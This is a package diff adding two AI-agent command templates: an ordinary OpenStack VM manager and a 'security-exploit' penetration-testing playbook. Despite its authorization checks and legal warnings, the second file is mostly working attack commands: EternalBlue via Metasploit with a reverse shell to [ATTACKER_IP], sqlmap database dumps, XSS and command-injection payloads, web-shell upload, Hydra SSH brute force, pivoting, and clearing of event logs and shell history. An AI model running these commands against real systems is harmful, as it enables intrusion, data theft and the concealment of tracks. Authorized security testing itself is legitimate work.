myaidev-method 0.2.18 → 0.2.22

package/src/templates/claude/commands/myai-openstack.md

@@ -0,0 +1,229 @@
+---
+name: myai-openstack
+description: Manage OpenStack VMs - create, list, delete, start, stop virtual machines
+---
+
+Manage OpenStack virtual machines and infrastructure based on the command: $ARGUMENTS
+
+## Command Syntax
+
+```
+/myai-openstack <action> [options]
+```
+
+## Available Actions
+
+### VM Operations
+- **create** - Create a new VM
+- **list** - List all VMs
+- **show <name>** - Show VM details
+- **delete <name>** - Delete a VM
+- **start <name>** - Start a stopped VM
+- **stop <name>** - Stop a running VM
+- **reboot <name>** - Reboot a VM
+- **console <name>** - Get console URL
+
+### Resource Discovery
+- **images** - List available images
+- **flavors** - List available flavors (sizes)
+- **networks** - List available networks
+- **keypairs** - List SSH keypairs
+- **security-groups** - List security groups
+
+### Network Operations
+- **floating-ips** - List floating IPs
+- **floating-ip create <network>** - Create floating IP
+- **floating-ip add <server> <ip>** - Add floating IP to server
+
+### Storage Operations
+- **volumes** - List volumes
+- **volume create <name> <size>** - Create volume
+- **volume attach <server> <volume>** - Attach volume to server
+
+### Cloud-Init Operations
+- **cloud-init info** - Show configured cloud-init defaults
+- **cloud-init fetch** - Fetch and preview cloud-init from URL/file/default
+- **cloud-init preview** - Preview the default cloud-init configuration
+
+### System Operations
+- **health** - Check OpenStack connectivity
+- **history** - Show operation history
+
+## Examples
+
+### Create a VM (basic)
+```
+/myai-openstack create myvm --image "Ubuntu 24.04" --flavor m1.small --keypair mykey
+```
+
+### Create a VM with default cloud-init
+```
+/myai-openstack create myvm --image "Ubuntu 24.04" --flavor m1.small --keypair mykey --use-default-cloud-init
+```
+
+### Create a VM with custom cloud-init URL
+```
+/myai-openstack create myvm --image "Ubuntu 24.04" --flavor m1.small --cloud-init-url "https://gist.github.com/user/abc123"
+```
+
+### Create a VM with cloud-init file
+```
+/myai-openstack create myvm --image "Ubuntu 24.04" --flavor m1.small --cloud-init-file "./my-cloud-init.yaml"
+```
+
+### List all VMs
+```
+/myai-openstack list
+```
+
+### Show VM details
+```
+/myai-openstack show myvm
+```
+
+### Start/Stop/Reboot
+```
+/myai-openstack start myvm
+/myai-openstack stop myvm
+/myai-openstack reboot myvm
+```
+
+### Delete a VM
+```
+/myai-openstack delete myvm
+```
+
+### Check available resources
+```
+/myai-openstack images
+/myai-openstack flavors
+/myai-openstack networks
+```
+
+### Assign floating IP
+```
+/myai-openstack floating-ip create external-network
+/myai-openstack floating-ip add myvm 203.0.113.10
+```
+
+## Process
+
+1. Parse $ARGUMENTS to determine the action and parameters
+2. Validate OpenStack credentials are configured
+3. Run health check if needed
+4. Execute the requested operation using the openstack-vm-manager agent
+5. Report results with clear formatting
+
+## Prerequisites
+
+Before using OpenStack commands, configure credentials:
+```
+/myai-configure openstack
+```
+
+This sets up:
+- OS_AUTH_URL
+- OS_USERNAME
+- OS_PASSWORD
+- OS_PROJECT_ID
+- OS_REGION_NAME
+
+## Create VM Workflow
+
+When user runs `create`:
+
+1. **Validate Parameters**
+   - Check required: name, image, flavor
+   - Validate optional: network, keypair, security_groups
+
+2. **Discovery** (if not specified)
+   - List images if image not specified
+   - List flavors if flavor not specified
+   - List networks if network not specified
+   - List keypairs if keypair not specified
+
+3. **Create Server**
+   - Use os_server_create with validated parameters
+   - Wait for server to become ACTIVE
+   - Report creation progress
+
+4. **Post-Creation**
+   - Get server details
+   - Report IP addresses
+   - Provide SSH connection instructions
+
+## Cloud-Init Configuration
+
+Cloud-init allows automatic provisioning of VMs with packages, users, and scripts.
+
+### Sources (in priority order)
+1. **Inline content** (`--user-data`): Direct YAML content
+2. **URL** (`--cloud-init-url`): Fetch from any URL (GitHub Gist supported)
+3. **File** (`--cloud-init-file`): Local file path
+4. **Default** (`--use-default-cloud-init`): Uses `CLOUD_INIT` from `.env`
+
+### Environment Variable
+Set in `.env`:
+```
+CLOUD_INIT=https://gist.github.com/username/gist-id
+```
+
+### Preview Cloud-Init
+```
+/myai-openstack cloud-init info      # Show configured defaults
+/myai-openstack cloud-init preview   # Preview default cloud-init content
+```
+
+### Example Cloud-Init
+```yaml
+#cloud-config
+package_update: true
+packages:
+  - docker.io
+  - nodejs
+users:
+  - name: developer
+    groups: [sudo, docker]
+    ssh_authorized_keys:
+      - ssh-rsa AAAA... your-key
+runcmd:
+  - systemctl enable docker
+```
+
+## Quick Start Guide
+
+1. Configure OpenStack: `/myai-configure openstack`
+2. Check connectivity: `/myai-openstack health`
+3. Find resources: `/myai-openstack images` and `/myai-openstack flavors`
+4. Preview cloud-init: `/myai-openstack cloud-init info`
+5. Create VM: `/myai-openstack create test-vm --image <image> --flavor <flavor> --use-default-cloud-init`
+6. Connect: SSH to the IP address provided
+
+## Error Handling
+
+### Not Configured
+```
+OpenStack credentials not configured.
+Run: /myai-configure openstack
+```
+
+### Authentication Failed
+```
+Authentication failed. Check your credentials.
+Verify password and project ID are correct.
+```
+
+### Resource Not Found
+```
+Image/Flavor/Network not found.
+Run: /myai-openstack images (or flavors/networks) to see available options.
+```
+
+## Integration
+
+This command uses the `openstack-vm-manager` agent which leverages:
+- OpenStack MCP server for API operations
+- Cloud-init for VM initialization
+- Session tracking for operation history
+
+Spawn the openstack-vm-manager agent to handle the requested operation.

package/src/templates/claude/commands/sc:security-exploit.md

@@ -0,0 +1,464 @@
+---
+name: security-exploit
+description: Exploitation operations with mandatory authorization and ethical guidelines
+version: 1.0.0
+category: security
+agent: penetration-tester
+---
+
+# Security Exploitation Command
+
+Execute exploitation operations following professional penetration testing standards with strict authorization and ethical guidelines.
+
+## ⚠️ CRITICAL WARNINGS
+
+**LEGAL REQUIREMENTS:**
+- Explicit written authorization REQUIRED before ANY exploitation
+- Unauthorized exploitation is ILLEGAL and subject to prosecution
+- Criminal penalties include imprisonment and substantial fines
+- Civil liability for damages caused by unauthorized testing
+
+**ETHICAL GUIDELINES:**
+- Exploitation ONLY on authorized targets within engagement scope
+- Minimize system disruption and data access
+- Immediately report critical vulnerabilities
+- Follow rules of engagement strictly
+- Maintain professional conduct at all times
+
+## Pre-Execution Requirements
+
+**CRITICAL Authorization Check:**
+```javascript
+import { requireAuthorization, AuthLevel } from '../../../src/libs/security/authorization-checker.js';
+
+// User must provide target
+const target = process.argv[2];
+if (!target) {
+  console.error('Usage: /sc:security-exploit <target>');
+  console.error('Example: /sc:security-exploit 192.168.1.10');
+  process.exit(1);
+}
+
+// Verify authorization (exploitation requires EXPLOITATION level)
+await requireAuthorization(target, AuthLevel.EXPLOITATION);
+
+// Display legal warning
+console.log('\n⚠️  LEGAL WARNING ⚠️\n');
+console.log('Exploitation operations authorized under engagement:');
+console.log(`- Engagement ID: ${manifest.engagement_id}`);
+console.log(`- Authorization Level: ${manifest.authorization_level}`);
+console.log(`- Authorized By: ${manifest.authorized_by}`);
+console.log(`- Valid Until: ${manifest.end_date}\n`);
+console.log('All exploitation activities will be logged.\n');
+```
+
+## Command Workflow
+
+When user requests exploitation on a target:
+
+### Step 1: Activate penetration-tester Agent
+
+```
+You are now in exploitation mode.
+
+Target: [USER_PROVIDED_TARGET]
+Authorization Level: EXPLOITATION (full testing authorized)
+
+⚠️  IMPORTANT REMINDERS:
+- Follow rules of engagement strictly
+- Minimize system disruption
+- Document all exploitation attempts
+- Report critical findings immediately
+- Maintain chain of custody for evidence
+
+Execute exploitation following this workflow:
+
+1. Vulnerability Validation
+2. Exploit Selection and Preparation
+3. Proof of Concept (PoC) Exploitation
+4. Post-Exploitation Activities (if authorized)
+5. Evidence Collection
+6. Immediate Reporting
+7. System Cleanup
+```
+
+### Step 2: Vulnerability Validation
+
+```bash
+# Verify vulnerability exists before exploitation
+nmap --script vuln -p [PORT] [TARGET]
+
+# Specific vulnerability verification
+# Example: SMB vulnerability check
+nmap --script smb-vuln-* -p 445 [TARGET]
+
+# Web application vulnerability validation
+nikto -h https://[TARGET]
+
+# Manual verification with curl/telnet
+curl -v https://[TARGET]/vulnerable-endpoint
+```
+
+### Step 3: Exploit Selection
+
+**Exploit Database Search:**
+```bash
+# Search exploit-db
+searchsploit [SERVICE] [VERSION]
+
+# Example: Apache 2.4.49 Path Traversal
+searchsploit apache 2.4.49
+
+# Copy exploit to workspace
+searchsploit -m exploits/[EXPLOIT_ID]
+```
+
+**Metasploit Framework:**
+```bash
+# Start Metasploit console
+msfconsole
+
+# Search for exploits
+msf6 > search [VULNERABILITY]
+msf6 > search type:exploit platform:linux
+
+# Example: EternalBlue exploitation
+msf6 > use exploit/windows/smb/ms17_010_eternalblue
+msf6 > show options
+msf6 > set RHOSTS [TARGET]
+msf6 > set PAYLOAD windows/x64/meterpreter/reverse_tcp
+msf6 > set LHOST [ATTACKER_IP]
+msf6 > check  # Verify vulnerability
+msf6 > exploit
+```
+
+### Step 4: Proof of Concept Exploitation
+
+**Web Application Exploitation:**
+
+**SQL Injection PoC:**
+```bash
+# Manual SQL injection testing
+curl "https://[TARGET]/login?user=admin' OR '1'='1"
+
+# SQLMap automated exploitation
+sqlmap -u "https://[TARGET]/page?id=1" --dbs
+sqlmap -u "https://[TARGET]/page?id=1" -D database --tables
+sqlmap -u "https://[TARGET]/page?id=1" -D database -T users --dump --limit 3
+```
+
+**XSS Exploitation:**
+```bash
+# Reflected XSS PoC
+curl "https://[TARGET]/search?q=<script>alert('XSS')</script>"
+
+# Stored XSS testing
+# POST payload to application
+curl -X POST https://[TARGET]/comment \
+  -d "comment=<script>alert('XSS')</script>"
+```
+
+**Remote Code Execution:**
+```bash
+# Command injection PoC
+curl "https://[TARGET]/ping?host=127.0.0.1;whoami"
+
+# File upload vulnerability
+curl -X POST https://[TARGET]/upload \
+  -F "file=@shell.php"
+
+# Verify code execution (proof only)
+curl https://[TARGET]/uploads/shell.php?cmd=whoami
+```
+
+**Network Service Exploitation:**
+
+**SSH Weak Credentials:**
+```bash
+# Hydra brute force (limited attempts)
+hydra -l admin -P /usr/share/wordlists/rockyou.txt ssh://[TARGET]
+
+# Single credential test
+sshpass -p 'password' ssh admin@[TARGET]
+```
+
+**SMB Exploitation:**
+```bash
+# EternalBlue exploitation with MSF
+msfconsole -q -x "use exploit/windows/smb/ms17_010_eternalblue; set RHOSTS [TARGET]; set PAYLOAD windows/x64/meterpreter/reverse_tcp; set LHOST [ATTACKER]; exploit"
+```
+
+### Step 5: Post-Exploitation (Only if Authorized)
+
+⚠️ **CRITICAL**: Only proceed if rules of engagement explicitly allow post-exploitation
+
+**Information Gathering:**
+```bash
+# Meterpreter commands
+meterpreter > sysinfo        # System information
+meterpreter > getuid         # Current user
+meterpreter > ps             # Running processes
+meterpreter > ipconfig       # Network configuration
+meterpreter > route          # Routing table
+
+# Limit data access to PoC only
+meterpreter > cat /etc/passwd | head -5  # Proof only
+meterpreter > ls /home       # Directory listing only
+```
+
+**Privilege Escalation:**
+```bash
+# Linux privilege escalation enumeration
+LinEnum.sh
+
+# Windows privilege escalation
+PowerUp.ps1
+
+# Kernel exploits (use with extreme caution)
+# Only with explicit authorization
+```
+
+**Lateral Movement (Internal Only):**
+```bash
+# Only if INTERNAL authorization level granted
+# Network discovery from compromised host
+meterpreter > run post/windows/gather/arp_scanner
+meterpreter > run post/multi/recon/local_exploit_suggester
+
+# Pivot through compromised host
+meterpreter > portfwd add -l 3389 -p 3389 -r [INTERNAL_TARGET]
+```
+
+### Step 6: Evidence Collection
+
+**Screenshot Evidence:**
+```bash
+# Meterpreter screenshot
+meterpreter > screenshot
+
+# Manual screenshot with scrot
+scrot evidence_[TARGET]_[TIMESTAMP].png
+
+# Web application evidence
+firefox https://[TARGET]/vulnerable-page
+# Screenshot showing exploitation
+```
+
+**Command Output Capture:**
+```bash
+# Log all exploitation attempts
+script exploitation_[TARGET]_[TIMESTAMP].log
+
+# Save command output
+whoami > evidence_whoami.txt
+id > evidence_id.txt
+uname -a > evidence_uname.txt
+```
+
+**Network Traffic Capture:**
+```bash
+# Capture exploitation traffic
+tcpdump -i eth0 -w exploitation_[TARGET].pcap host [TARGET]
+
+# Wireshark capture
+wireshark -i eth0 -k -f "host [TARGET]"
+```
+
+### Step 7: Immediate Reporting
+
+**Critical Finding Notification:**
+```markdown
+# CRITICAL SECURITY FINDING
+
+**Date:** [TIMESTAMP]
+**Engagement ID:** [ENGAGEMENT_ID]
+**Severity:** CRITICAL
+
+## Vulnerability Summary
+
+**Type:** [Remote Code Execution / SQL Injection / etc.]
+**Affected System:** [TARGET]
+**CVSS Score:** [9.8 / Critical]
+
+## Proof of Concept
+
+**Exploitation Steps:**
+1. [STEP_1]
+2. [STEP_2]
+3. [ACHIEVED_RCE/ACCESS]
+
+**Evidence:**
+- Screenshot: [FILENAME]
+- Command Output: [FILENAME]
+- Network Capture: [FILENAME]
+
+## Impact Assessment
+
+**Business Impact:**
+- Complete system compromise possible
+- Sensitive data exposure risk
+- Potential for lateral movement
+
+**Technical Impact:**
+- Remote code execution as [USER]
+- Ability to [READ/WRITE/EXECUTE]
+- Network pivot point established
+
+## Immediate Recommendations
+
+**URGENT (0-24 hours):**
+1. [IMMEDIATE_FIX]
+2. [TEMPORARY_MITIGATION]
+3. [MONITORING]
+
+**Contact:** [SECURITY_CONTACT]
+**Next Steps:** [COORDINATION]
+```
+
+### Step 8: System Cleanup
+
+**Remove Artifacts:**
+```bash
+# Remove uploaded files
+rm /var/www/html/uploads/shell.php
+
+# Clear command history
+history -c
+rm ~/.bash_history
+
+# Remove created users/accounts
+userdel testuser
+
+# Stop persistent services
+systemctl stop malicious_service
+
+# Remove cron jobs
+crontab -r
+```
+
+**Graceful Session Exit:**
+```bash
+# Meterpreter
+meterpreter > clearev  # Clear event logs (only if authorized)
+meterpreter > exit
+
+# SSH
+exit
+
+# Close all connections
+netstat -an | grep [ATTACKER_IP]
+```
+
+## Usage Examples
+
+**Web Application Exploitation:**
+```
+User: "/sc:security-exploit https://app.example.com --sqli"
+
+Response:
+1. Verify EXPLOITATION authorization for app.example.com
+2. Validate SQL injection vulnerability
+3. Execute SQLMap with limited extraction
+4. Capture evidence (3 sample records max)
+5. Immediate critical finding report
+6. Clean up temporary files
+7. Save exploitation report
+```
+
+**Network Service Exploitation:**
+```
+User: "/sc:security-exploit 192.168.1.50 --service smb"
+
+Response:
+1. Check EXPLOITATION authorization for 192.168.1.50
+2. Validate SMB vulnerability (MS17-010)
+3. Metasploit exploitation with reverse shell
+4. Limited post-exploitation (sysinfo, getuid only)
+5. Screenshot and evidence capture
+6. Graceful session termination
+7. Generate exploitation report
+```
+
+**Privilege Escalation:**
+```
+User: "/sc:security-exploit 192.168.1.10 --privesc"
+
+Response:
+1. Verify EXPLOITATION authorization
+2. Enumerate privilege escalation vectors
+3. Attempt authorized escalation method
+4. Document root/SYSTEM access (PoC)
+5. No data exfiltration (PoC only)
+6. System cleanup
+7. Critical finding report
+```
+
+## Output
+
+Save exploitation report to:
+```
+reports/exploitation-[TARGET]-[TIMESTAMP].md
+```
+
+Log all operations:
+```javascript
+await authChecker.logOperation({
+  type: 'exploitation',
+  target: target,
+  vulnerability: vulnerabilityType,
+  result: 'successful_poc',
+  impact: 'critical',
+  user: process.env.USER,
+  evidence_files: evidenceFiles
+});
+```
+
+## Error Handling
+
+**No Authorization:**
+```
+❌ AUTHORIZATION REQUIRED - EXPLOITATION BLOCKED
+
+Target: 192.168.1.50
+Required Level: EXPLOITATION
+Current Level: ACTIVE
+
+CRITICAL: Exploitation requires explicit EXPLOITATION authorization.
+Unauthorized exploitation is ILLEGAL.
+
+This operation has been blocked and logged.
+```
+
+**Out of Scope:**
+```
+❌ TARGET OUT OF SCOPE - EXPLOITATION BLOCKED
+
+Target: production-db.example.com
+Status: EXPLICITLY OUT OF SCOPE
+
+This target is marked as out-of-scope in the authorization manifest.
+Exploitation is PROHIBITED on this system.
+
+This attempt has been logged for audit purposes.
+```
+
+**Engagement Expired:**
+```
+❌ ENGAGEMENT EXPIRED - EXPLOITATION BLOCKED
+
+Engagement End Date: 2025-11-25
+Current Date: 2025-11-26
+
+The authorized testing period has ended.
+No further exploitation is permitted.
+
+Contact client to extend authorization if needed.
+```
+
+---
+
+**Agent:** penetration-tester
+**Authorization Level:** EXPLOITATION
+**Version:** 1.0.0
+
+**⚠️  FINAL WARNING:** This command executes active exploitation. Ensure you have explicit written authorization, understand the legal implications, and follow all rules of engagement. Unauthorized use is strictly prohibited and illegal.